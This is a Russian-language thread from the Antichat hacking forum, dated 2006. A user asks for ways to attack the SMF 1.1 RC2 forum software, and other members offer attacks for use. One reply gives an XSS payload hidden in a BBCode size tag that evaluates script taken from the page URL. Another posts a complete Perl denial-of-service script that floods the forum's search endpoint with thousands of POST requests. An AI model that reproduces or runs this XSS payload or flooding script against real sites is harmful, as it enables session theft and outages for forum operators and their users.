ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Smf 1.1 Rc2
  #1  
Старый 09.07.2006, 20:43
Аватар для TERYS
TERYS
Участник форума
Регистрация: 11.01.2006
Сообщений: 128
Провел на форуме:
612424

Репутация: 55
По умолчанию Smf 1.1 Rc2

Люди подскажите каикето уязвимости в этом форуме Smf 1.1 Rc2 ! жду..
 
Ответить с цитированием

  #2  
Старый 09.07.2006, 20:51
Аватар для Dracula4ever
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

Я не знаю сработает ли эта уязвимость на Smf 1.1 Rc2 но попробуй выполнить XSS нападение с этим кодом :
Цитата:
[size=expression(eval(unescape(document.URL.substri ng(document.URL.
length-41,document.URL.length))))]Big Exploit[/size]
 
Ответить с цитированием

  #3  
Старый 09.07.2006, 21:26
Аватар для a1nt
a1nt
Участник форума
Регистрация: 16.12.2005
Сообщений: 146
Провел на форуме:
573934

Репутация: 114
По умолчанию

Вообще очень надежный форум. Последняя уязвимость была замечена где-то год назад. И все.
 
Ответить с цитированием

  #4  
Старый 09.07.2006, 21:32
Аватар для TERYS
TERYS
Участник форума
Регистрация: 11.01.2006
Сообщений: 128
Провел на форуме:
612424

Репутация: 55
Question

Цитата:
Сообщение от dracula4ever  
Я не знаю сработает ли эта уязвимость на Smf 1.1 Rc2 но попробуй выполнить XSS нападение с этим кодом :
Этот код просто в сообщение вписать?
Как потом можно будет им воспользоватся?
 
Ответить с цитированием

  #5  
Старый 11.07.2006, 13:06
Аватар для CMD
CMD
Новичок
Регистрация: 21.06.2006
Сообщений: 17
Провел на форуме:
45009

Репутация: 1
По умолчанию

Вот тебе Dos exploit выполненый на перле.
Код:
#!/usr/bin/perl
use IO::Socket;
print q{
################################################## ##########
# CMD#
################################################## ##########
};
$rand=rand(10);
print "Forum Host: ";
$serv = <stdin>;
chop ($serv);
print "Forum Path: ";
$path = <stdin>;
chop ($path);
for ($i=0; $i<9999; $i++)
{
$postit = "search=Albanian+Hackers+Group+Proof+of+Concept+$x+ &search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";

$lrg = length $postit; 

my $sock = new IO::Socket::INET ( 
PeerAddr => "$serv", 
PeerPort => "80", 
Proto => "tcp", 
); 
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; 

print $sock "POST $path"."index.php?action=search2 HTTP/1.1\n"; 
print $sock "Host: $serv\n"; 
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n"; 
print $sock "Referer: $serv\n"; 
print $sock "Accept-Language: en-us\n"; 
print $sock "Content-Type: application/x-www-form-urlencoded\n"; 
print $sock "Accept-Encoding: gzip, deflate\n"; 
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; 
print $sock "Connection: Keep-Alive\n"; 
print $sock "Cache-Control: no-cache\n"; 
print $sock "Content-Length: $lrg\n\n"; 
print $sock "$postit\n"; 
close($sock); 

## Print a "+" for every loop 
syswrite STDOUT, "+"; 
}
print "Forum shuld be Dosed. Check it out...\n";
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Нужен эксплойт под Smf 1.1 Rc2 DimaHbl4 Форумы 3 17.05.2006 12:57
Уязвимости в Smf 1.1 Rc2. Paran0ya Форумы 1 30.04.2006 13:15
Сплоит для SMF 1.1 rc2 DOS Go0o$E Форумы 0 19.03.2006 20:40
Взлом Smf... Как это сделать? FST Чаты 1 28.07.2005 02:27



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ